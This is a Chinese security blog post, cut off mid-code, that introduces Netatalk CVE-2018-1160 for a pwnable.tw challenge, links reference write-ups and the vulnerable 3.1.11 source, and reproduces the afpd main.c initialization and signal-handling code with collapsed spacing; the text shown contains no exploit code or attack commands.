文章总结： 本文记录了NetatalkCVE-2018-1160漏洞的学习与复现过程，简述了Netatalk作为AFP文件服务器的背景。作者提供了源码下载链接并展开代码审计，详细分析了afpd主模块中main.c的初始化与信号处理函数，但文档内容在源码分析阶段中断，未包含具体的漏洞原理或利用方法。 综合评分： 48 文章分类： 漏洞分析,代码审计,二进制安全

Netatalk CVE-2018-1160 复现及漏洞利用思路

小M安全

2026年3月3日 16:49 浙江

这个cve的编号是我在pwnable这个上面的一个赛题因此我们这里进行对这个cve的一个学习

这里我们参考了要给文章地址放在这里下面

https://www.cnblogs.com/cx1ng/p/17293481.html

https://gtrboy.github.io/posts/netatalk/#题目信息

https://www.secreu.cn/2025/09/06/pwnable-tw-CVE-2018-1160/

前提知识

1.1netatalk

netattalk是一个开源的文件服务器，他是基于apple filing protocol协议进行一个通信的，而这个afp协议是苹果开发的一个文件协议，苹果文件服务的一部分

1.2源码分析

因为这个是一个开源的文件服务器，因此师傅们需要去下载一个带源码的漏洞版本进行一个分析这里我会把下载的链接给各位师傅们(https://sourceforge.net/projects/netatalk/files/netatalk/3.1.11/netatalk-3.1.11.tar.gz/download)

接下来我们分析源码对于理解Netatalk，主模块afpd和AFP协议流量包处理模块libnetatalk。其中afpd主要功能为初始化服务的环境、监听和接受处理请求并为之构建请求处理的环境，而libnetatalk是具体解析和处理dsi流量的。

同时我们应该先看这个afpd这个文件夹中的信息，同时也是从main.c文件开始查看地址实在/etc/afpd/main.c文件下,下面就是他的一个main的源码

 /*
* Copyright (c) 1990,1993 Regents of The University of Michigan.
* All Rights Reserved.  See COPYRIGHT.
*/

#ifdef HAVE_CONFIG_H
#include "config.h"
#endif /* HAVE_CONFIG_H */

#include&nbsp;<errno.h>
#include&nbsp;<poll.h>
#include&nbsp;<signal.h>
#include&nbsp;<stdio.h>
#include&nbsp;<stdlib.h>
#include&nbsp;<string.h>
#include&nbsp;<sys/param.h>
#include&nbsp;<sys/resource.h>
#include&nbsp;<sys/socket.h>
#include&nbsp;<sys/time.h>
#include&nbsp;<sys/uio.h>
#include&nbsp;<sys/wait.h>

#include&nbsp;<atalk/adouble.h>
#include&nbsp;<atalk/afp.h>
#include&nbsp;<atalk/atp.h>
#include&nbsp;<atalk/asp.h>
#include&nbsp;<atalk/compat.h>
#include&nbsp;<atalk/dsi.h>
#include&nbsp;<atalk/errchk.h>
#include&nbsp;<atalk/globals.h>
#include&nbsp;<atalk/logger.h>
#include&nbsp;<atalk/nbp.h>
#include&nbsp;<atalk/netatalk_conf.h>
#include&nbsp;<atalk/server_child.h>
#include&nbsp;<atalk/server_ipc.h>
#include&nbsp;<atalk/util.h>

#include&nbsp;"afp_config.h"
#include&nbsp;"afpstats.h"
#include&nbsp;"fork.h"
#include&nbsp;"status.h"
#include&nbsp;"uam_auth.h"

#define&nbsp;ASEV_THRESHHOLD 10

unsignedcharnologin=0;

staticAFPObjdsi_obj;
staticAFPObjasp_obj;
staticserver_child_t*server_children;
staticsig_atomic_treloadconfig=0;
staticsig_atomic_tgotsigchld=0;
staticstructasev*asev;

staticafp_child_t*dsi_start(AFPObj*obj,&nbsp;DSI*dsi,
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;server_child_t*server_children);
staticintasp_start(AFPObj*obj,&nbsp;server_child_t*server_children);
staticvoidasp_cleanup(constAFPObj*obj);

staticvoidafp_exit(intret)
{
&nbsp; &nbsp;&nbsp;exit(ret);
}

/* ------------------
&nbsp; &nbsp;initialize fd set we are waiting for.
*/
staticboolinit_listening_sockets(constAFPObj*dsiconfig,
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;constAFPObj*aspconfig)
{
&nbsp; &nbsp;&nbsp;DSI*dsi;
&nbsp; &nbsp;&nbsp;intnumlisteners;

&nbsp; &nbsp;&nbsp;for&nbsp;(numlisteners=0,&nbsp;dsi=dsiconfig->dsi;&nbsp;dsi;&nbsp;dsi=dsi->next) {
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;numlisteners++;
&nbsp; &nbsp; }

&nbsp; &nbsp;&nbsp;asev=asev_init(dsiconfig->options.connections+numlisteners+
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;ASEV_THRESHHOLD);

&nbsp; &nbsp;&nbsp;if&nbsp;(asev==NULL) {
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;returnfalse;
&nbsp; &nbsp; }

&nbsp; &nbsp;&nbsp;for&nbsp;(dsi=dsiconfig->dsi;&nbsp;dsi;&nbsp;dsi=dsi->next) {
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(!(asev_add_fd(asev,&nbsp;dsi->serversock,&nbsp;LISTEN_FD,&nbsp;dsi,&nbsp;AFPPROTO_DSI))) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;returnfalse;
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; }

#ifndef&nbsp;NO_DDP

&nbsp; &nbsp;&nbsp;if&nbsp;(!(asev_add_fd(asev,&nbsp;aspconfig->fd,&nbsp;LISTEN_FD,&nbsp;0,&nbsp;AFPPROTO_ASP))) {
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;returnfalse;
&nbsp; &nbsp; }

#endif&nbsp;/* no afp/asp */
&nbsp; &nbsp;&nbsp;returntrue;
}

staticboolreset_listening_sockets(constAFPObj*dsiconfig,
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;constAFPObj*aspconfig)
{
&nbsp; &nbsp;&nbsp;constDSI*dsi;

&nbsp; &nbsp;&nbsp;for&nbsp;(dsi=dsiconfig->dsi;&nbsp;dsi;&nbsp;dsi=dsi->next) {
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(!(asev_del_fd(asev,&nbsp;dsi->serversock))) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;returnfalse;
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; }

#ifndef&nbsp;NO_DDP

&nbsp; &nbsp;&nbsp;/* only attempt to reset asp socket if we have one */
&nbsp; &nbsp;&nbsp;if&nbsp;(aspconfig->fd) {
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(!(asev_del_fd(asev,&nbsp;aspconfig->fd))) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;returnfalse;
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; }

#endif&nbsp;/* no afp/asp */
&nbsp; &nbsp;&nbsp;returntrue;
}

/* ------------------ */
staticvoidafp_goaway(intsig)
{
#ifndef&nbsp;NO_DDP
&nbsp; &nbsp;&nbsp;asp_kill(sig);
#endif&nbsp;/* ! NO_DDP */

&nbsp; &nbsp;&nbsp;switch&nbsp;(sig) {
&nbsp; &nbsp;&nbsp;caseSIGTERM:
&nbsp; &nbsp;&nbsp;caseSIGQUIT:
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;LOG(log_note,&nbsp;logtype_afpd,&nbsp;"AFP Server shutting down");

&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(server_children) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;server_child_kill(server_children,&nbsp;SIGTERM);
&nbsp; &nbsp; &nbsp; &nbsp; }

#ifndef&nbsp;NO_DDP

&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(asp_obj.handle) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;asp_cleanup(&asp_obj);
&nbsp; &nbsp; &nbsp; &nbsp; }

#endif&nbsp;/* ! NO_DDP */
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;_exit(0);
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;break;

&nbsp; &nbsp;&nbsp;caseSIGUSR1&nbsp;:
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;nologin++;
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;auth_unload();
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;LOG(log_info,&nbsp;logtype_afpd,&nbsp;"disallowing logins");

&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(server_children) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;server_child_kill(server_children,&nbsp;sig);
&nbsp; &nbsp; &nbsp; &nbsp; }

&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;break;

&nbsp; &nbsp;&nbsp;caseSIGHUP&nbsp;:
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;/* w/ a configuration file, we can force a re-read if we want */
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;reloadconfig=1;
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;break;

&nbsp; &nbsp;&nbsp;caseSIGCHLD:
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;/* w/ a configuration file, we can force a re-read if we want */
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;gotsigchld=1;
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;break;

&nbsp; &nbsp;&nbsp;default&nbsp;:
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;LOG(log_error,&nbsp;logtype_afpd,&nbsp;"afp_goaway: bad signal");
&nbsp; &nbsp; }

&nbsp; &nbsp;&nbsp;return;
}

staticvoidchild_handler(void)
{
&nbsp; &nbsp;&nbsp;intfd;
&nbsp; &nbsp;&nbsp;intstatus;
&nbsp; &nbsp;&nbsp;pid_tpid;
#ifndef&nbsp;WAIT_ANY
#define&nbsp;WAIT_ANY (-1)
#endif&nbsp;/* ! WAIT_ANY */

&nbsp; &nbsp;&nbsp;while&nbsp;((pid=waitpid(WAIT_ANY,&nbsp;&status,&nbsp;WNOHANG))&nbsp;>0) {
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(WIFEXITED(status)) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(WEXITSTATUS(status)) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;LOG(log_info,&nbsp;logtype_afpd,&nbsp;"child[%d]: exited %d",&nbsp;pid,&nbsp;WEXITSTATUS(status));
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }&nbsp;else&nbsp;{
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;LOG(log_info,&nbsp;logtype_afpd,&nbsp;"child[%d]: done",&nbsp;pid);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; }&nbsp;else&nbsp;{
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(WIFSIGNALED(status)) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;LOG(log_info,&nbsp;logtype_afpd,&nbsp;"child[%d]: killed by signal %d",&nbsp;pid,
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;WTERMSIG(status));
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }&nbsp;else&nbsp;{
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;LOG(log_info,&nbsp;logtype_afpd,&nbsp;"child[%d]: died",&nbsp;pid);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; }

&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;fd=server_child_remove(server_children,&nbsp;pid);

&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(fd==-1) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;continue;
&nbsp; &nbsp; &nbsp; &nbsp; }

&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(!(asev_del_fd(asev,&nbsp;fd))) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;LOG(log_error,&nbsp;logtype_afpd,&nbsp;"child[%d]: asev_del_fd: %d",&nbsp;pid,&nbsp;fd);
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; }
}

staticintsetlimits(void)
{
&nbsp; &nbsp;&nbsp;structrlimitrlim;

&nbsp; &nbsp;&nbsp;if&nbsp;(getrlimit(RLIMIT_NOFILE,&nbsp;&rlim)&nbsp;!=0) {
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;LOG(log_warning,&nbsp;logtype_afpd,&nbsp;"setlimits: reading current limits failed: %s",
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;strerror(errno));
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return-1;
&nbsp; &nbsp; }

&nbsp; &nbsp;&nbsp;if&nbsp;(rlim.rlim_cur!=RLIM_INFINITY&&rlim.rlim_cur<RLIM_MAX) {
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;rlim.rlim_cur=RLIM_MAX;

&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(rlim.rlim_max!=RLIM_INFINITY&&rlim.rlim_max<RLIM_MAX) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;rlim.rlim_max=RLIM_MAX;
&nbsp; &nbsp; &nbsp; &nbsp; }

&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(setrlimit(RLIMIT_NOFILE,&nbsp;&rlim)&nbsp;!=0) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;LOG(log_warning,&nbsp;logtype_afpd,&nbsp;"setlimits: increasing limits failed: %s",
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;strerror(errno));
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return-1;
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; }

&nbsp; &nbsp;&nbsp;return0;
}

intmain(intac,&nbsp;char**av)
{
&nbsp; &nbsp;&nbsp;structsigactionsv;
&nbsp; &nbsp;&nbsp;sigset_t&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;sigs;
&nbsp; &nbsp;&nbsp;int&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;ret;
&nbsp; &nbsp;&nbsp;/* Parse argv args and initialize default options */
&nbsp; &nbsp;&nbsp;afp_options_parse_cmdline(&dsi_obj,&nbsp;ac,&nbsp;av);

&nbsp; &nbsp;&nbsp;if&nbsp;(!(dsi_obj.cmdlineflags&OPTION_DEBUG)&nbsp;&&&nbsp;(daemonize()&nbsp;!=0)) {
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;exit(EXITERR_SYS);
&nbsp; &nbsp; }

&nbsp; &nbsp;&nbsp;/* Log SIGBUS/SIGSEGV SBT */
&nbsp; &nbsp;&nbsp;fault_setup(NULL);

&nbsp; &nbsp;&nbsp;if&nbsp;(afp_config_parse(&dsi_obj,&nbsp;"afpd")&nbsp;!=0) {
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;afp_exit(EXITERR_CONF);
&nbsp; &nbsp; }

&nbsp; &nbsp;&nbsp;/* Save the user's current umask */
&nbsp; &nbsp;&nbsp;dsi_obj.options.save_mask=umask(dsi_obj.options.umask);

&nbsp; &nbsp;&nbsp;/* install child handler for asp and dsi. we do this before afp_goaway
&nbsp; &nbsp; &nbsp;* as afp_goaway references stuff from here.
&nbsp; &nbsp; &nbsp;* XXX: this should really be setup after the initial connections. */
&nbsp; &nbsp;&nbsp;if&nbsp;(!(server_children=server_child_alloc(dsi_obj.options.connections))) {
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;LOG(log_error,&nbsp;logtype_afpd,&nbsp;"main: server_child alloc: %s",&nbsp;strerror(errno));
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;afp_exit(EXITERR_SYS);
&nbsp; &nbsp; }

#ifndef&nbsp;NO_DDP

&nbsp; &nbsp;&nbsp;/* initialize appletalk protocol support if enabled */
&nbsp; &nbsp;&nbsp;if&nbsp;(dsi_obj.options.flags&OPTION_DDP) {
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;afp_options_parse_cmdline(&asp_obj,&nbsp;ac,&nbsp;av);

&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(afp_config_parse(&asp_obj,&nbsp;"afpd")&nbsp;!=0) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;afp_exit(EXITERR_CONF);
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; }

#endif&nbsp;/* no afp/asp */
&nbsp; &nbsp;&nbsp;sigemptyset(&sigs);
&nbsp; &nbsp;&nbsp;pthread_sigmask(SIG_SETMASK,&nbsp;&sigs,&nbsp;NULL);
&nbsp; &nbsp;&nbsp;memset(&sv,&nbsp;0,&nbsp;sizeof(sv));
&nbsp; &nbsp;&nbsp;/* linux at least up to 2.4.22 send a SIGXFZ for vfat fs,
&nbsp; &nbsp; &nbsp; &nbsp;even if the file is open with O_LARGEFILE ! */
#ifdef&nbsp;SIGXFSZ
&nbsp; &nbsp;&nbsp;sv.sa_handler=SIG_IGN;
&nbsp; &nbsp;&nbsp;sigemptyset(&sv.sa_mask);

&nbsp; &nbsp;&nbsp;if&nbsp;(sigaction(SIGXFSZ,&nbsp;&sv,&nbsp;NULL)&nbsp;<0) {
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;LOG(log_error,&nbsp;logtype_afpd,&nbsp;"main: sigaction: %s",&nbsp;strerror(errno));
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;afp_exit(EXITERR_SYS);
&nbsp; &nbsp; }

#endif
&nbsp; &nbsp;&nbsp;sv.sa_handler=SIG_IGN;
&nbsp; &nbsp;&nbsp;sigemptyset(&sv.sa_mask);

&nbsp; &nbsp;&nbsp;if&nbsp;(sigaction(SIGPIPE,&nbsp;&sv,&nbsp;NULL)&nbsp;<0) {
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;LOG(log_error,&nbsp;logtype_afpd,&nbsp;"main: sigaction: %s",&nbsp;strerror(errno));
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;afp_exit(EXITERR_SYS);
&nbsp; &nbsp; }

&nbsp; &nbsp;&nbsp;sv.sa_handler=afp_goaway;&nbsp;/* handler for all sigs */
&nbsp; &nbsp;&nbsp;sigemptyset(&sv.sa_mask);
&nbsp; &nbsp;&nbsp;sigaddset(&sv.sa_mask,&nbsp;SIGALRM);
&nbsp; &nbsp;&nbsp;sigaddset(&sv.sa_mask,&nbsp;SIGHUP);
&nbsp; &nbsp;&nbsp;sigaddset(&sv.sa_mask,&nbsp;SIGTERM);
&nbsp; &nbsp;&nbsp;sigaddset(&sv.sa_mask,&nbsp;SIGUSR1);
&nbsp; &nbsp;&nbsp;sigaddset(&sv.sa_mask,&nbsp;SIGQUIT);
&nbsp; &nbsp;&nbsp;sv.sa_flags=SA_RESTART;

&nbsp; &nbsp;&nbsp;if&nbsp;(sigaction(SIGCHLD,&nbsp;&sv,&nbsp;NULL)&nbsp;<0) {
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;LOG(log_error,&nbsp;logtype_afpd,&nbsp;"main: sigaction: %s",&nbsp;strerror(errno));
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;afp_exit(EXITERR_SYS);
&nbsp; &nbsp; }

&nbsp; &nbsp;&nbsp;sigemptyset(&sv.sa_mask);
&nbsp; &nbsp;&nbsp;sigaddset(&sv.sa_mask,&nbsp;SIGALRM);
&nbsp; &nbsp;&nbsp;sigaddset(&sv.sa_mask,&nbsp;SIGTERM);
&nbsp; &nbsp;&nbsp;sigaddset(&sv.sa_mask,&nbsp;SIGHUP);
&nbsp; &nbsp;&nbsp;sigaddset(&sv.sa_mask,&nbsp;SIGCHLD);
&nbsp; &nbsp;&nbsp;sigaddset(&sv.sa_mask,&nbsp;SIGQUIT);
&nbsp; &nbsp;&nbsp;sv.sa_flags=SA_RESTART;

&nbsp; &nbsp;&nbsp;if&nbsp;(sigaction(SIGUSR1,&nbsp;&sv,&nbsp;NULL)&nbsp;<0) {
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;LOG(log_error,&nbsp;logtype_afpd,&nbsp;"main: sigaction: %s",&nbsp;strerror(errno));
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;afp_exit(EXITERR_SYS);
&nbsp; &nbsp; }

&nbsp; &nbsp;&nbsp;sigemptyset(&sv.sa_mask);
&nbsp; &nbsp;&nbsp;sigaddset(&sv.sa_mask,&nbsp;SIGALRM);
&nbsp; &nbsp;&nbsp;sigaddset(&sv.sa_mask,&nbsp;SIGTERM);
&nbsp; &nbsp;&nbsp;sigaddset(&sv.sa_mask,&nbsp;SIGUSR1);
&nbsp; &nbsp;&nbsp;sigaddset(&sv.sa_mask,&nbsp;SIGCHLD);
&nbsp; &nbsp;&nbsp;sigaddset(&sv.sa_mask,&nbsp;SIGQUIT);
&nbsp; &nbsp;&nbsp;sv.sa_flags=SA_RESTART;

&nbsp; &nbsp;&nbsp;if&nbsp;(sigaction(SIGHUP,&nbsp;&sv,&nbsp;NULL)&nbsp;<0) {
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;LOG(log_error,&nbsp;logtype_afpd,&nbsp;"main: sigaction: %s",&nbsp;strerror(errno));
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;afp_exit(EXITERR_SYS);
&nbsp; &nbsp; }

&nbsp; &nbsp;&nbsp;sigemptyset(&sv.sa_mask);
&nbsp; &nbsp;&nbsp;sigaddset(&sv.sa_mask,&nbsp;SIGALRM);
&nbsp; &nbsp;&nbsp;sigaddset(&sv.sa_mask,&nbsp;SIGHUP);
&nbsp; &nbsp;&nbsp;sigaddset(&sv.sa_mask,&nbsp;SIGUSR1);
&nbsp; &nbsp;&nbsp;sigaddset(&sv.sa_mask,&nbsp;SIGCHLD);
&nbsp; &nbsp;&nbsp;sigaddset(&sv.sa_mask,&nbsp;SIGQUIT);
&nbsp; &nbsp;&nbsp;sv.sa_flags=SA_RESTART;

&nbsp; &nbsp;&nbsp;if&nbsp;(sigaction(SIGTERM,&nbsp;&sv,&nbsp;NULL)&nbsp;<0) {
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;LOG(log_error,&nbsp;logtype_afpd,&nbsp;"main: sigaction: %s",&nbsp;strerror(errno));
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;afp_exit(EXITERR_SYS);
&nbsp; &nbsp; }

&nbsp; &nbsp;&nbsp;sigemptyset(&sv.sa_mask);
&nbsp; &nbsp;&nbsp;sigaddset(&sv.sa_mask,&nbsp;SIGALRM);
&nbsp; &nbsp;&nbsp;sigaddset(&sv.sa_mask,&nbsp;SIGHUP);
&nbsp; &nbsp;&nbsp;sigaddset(&sv.sa_mask,&nbsp;SIGUSR1);
&nbsp; &nbsp;&nbsp;sigaddset(&sv.sa_mask,&nbsp;SIGCHLD);
&nbsp; &nbsp;&nbsp;sigaddset(&sv.sa_mask,&nbsp;SIGTERM);
&nbsp; &nbsp;&nbsp;sv.sa_flags=SA_RESTART;

&nbsp; &nbsp;&nbsp;if&nbsp;(sigaction(SIGQUIT,&nbsp;&sv,&nbsp;NULL)&nbsp;<0) {
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;LOG(log_error,&nbsp;logtype_afpd,&nbsp;"main: sigaction: %s",&nbsp;strerror(errno));
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;afp_exit(EXITERR_SYS);
&nbsp; &nbsp; }

&nbsp; &nbsp;&nbsp;/* afp.conf: &nbsp;not in config file: lockfile, configfile
&nbsp; &nbsp; &nbsp;* &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;preference: command-line provides defaults.
&nbsp; &nbsp; &nbsp;* &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;config file over-writes defaults.
&nbsp; &nbsp; &nbsp;*
&nbsp; &nbsp; &nbsp;* we also need to make sure that killing afpd during startup
&nbsp; &nbsp; &nbsp;* won't leave any lingering registered names around.
&nbsp; &nbsp; &nbsp;*/
&nbsp; &nbsp;&nbsp;sigemptyset(&sigs);
&nbsp; &nbsp;&nbsp;sigaddset(&sigs,&nbsp;SIGALRM);
&nbsp; &nbsp;&nbsp;sigaddset(&sigs,&nbsp;SIGHUP);
&nbsp; &nbsp;&nbsp;sigaddset(&sigs,&nbsp;SIGUSR1);
&nbsp; &nbsp;&nbsp;sigaddset(&sigs,&nbsp;SIGCHLD);
&nbsp; &nbsp;&nbsp;pthread_sigmask(SIG_BLOCK,&nbsp;&sigs,&nbsp;NULL);
#ifdef&nbsp;HAVE_DBUS_GLIB

&nbsp; &nbsp;&nbsp;/* Run dbus AFP statistics thread */
&nbsp; &nbsp;&nbsp;if&nbsp;(dsi_obj.options.flags&OPTION_DBUS_AFPSTATS) {
&nbsp; &nbsp; &nbsp; &nbsp; (void)afpstats_init(server_children);
&nbsp; &nbsp; }

#endif

&nbsp; &nbsp;&nbsp;if&nbsp;(configinit(&dsi_obj,&nbsp;&asp_obj)&nbsp;!=0) {
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;LOG(log_error,&nbsp;logtype_afpd,&nbsp;"main: no servers configured");
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;afp_exit(EXITERR_CONF);
&nbsp; &nbsp; }

&nbsp; &nbsp;&nbsp;pthread_sigmask(SIG_UNBLOCK,&nbsp;&sigs,&nbsp;NULL);
&nbsp; &nbsp;&nbsp;/* Initialize */
&nbsp; &nbsp;&nbsp;cnid_init();

&nbsp; &nbsp;&nbsp;/* watch atp, dsi sockets and ipc parent/child file descriptor. */
&nbsp; &nbsp;&nbsp;if&nbsp;(!(init_listening_sockets(&dsi_obj,&nbsp;&asp_obj))) {
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;LOG(log_error,&nbsp;logtype_afpd,&nbsp;"main: couldn't initialize socket handler");
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;afp_exit(EXITERR_CONF);
&nbsp; &nbsp; }

&nbsp; &nbsp;&nbsp;/* set limits */
&nbsp; &nbsp; (void)setlimits();
&nbsp; &nbsp;&nbsp;afp_child_t*child;
&nbsp; &nbsp;&nbsp;intsaveerrno;

&nbsp; &nbsp;&nbsp;/* wait for an appleshare connection. parent remains in the loop
&nbsp; &nbsp; &nbsp;* while the children get handled by afp_over_{asp,dsi}. &nbsp;this is
&nbsp; &nbsp; &nbsp;* currently vulnerable to a denial-of-service attack if a
&nbsp; &nbsp; &nbsp;* connection is made without an actual login attempt being made
&nbsp; &nbsp; &nbsp;* afterwards. establishing timeouts for logins is a possible
&nbsp; &nbsp; &nbsp;* solution. */
&nbsp; &nbsp;&nbsp;while&nbsp;(1) {
&nbsp; &nbsp; …………

&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;for&nbsp;(inti=0;&nbsp;i<asev->used;&nbsp;i++) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(asev->fdset[i].revents&&nbsp;(POLLIN|POLLERR|POLLHUP|POLLNVAL)) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;switch&nbsp;(asev->data[i].fdtype) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;caseLISTEN_FD:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;switch&nbsp;(asev->data[i].protocol) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;caseAFPPROTO_DSI:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;((child = dsi_start(&obj, (DSI *)(asev->data[i].private), server_children))) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(!(asev_add_fd(asev,&nbsp;child->afpch_ipc_fd,&nbsp;IPC_FD,&nbsp;child,&nbsp;0))) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;LOG(log_error,&nbsp;logtype_afpd,&nbsp;"out of asev slots");
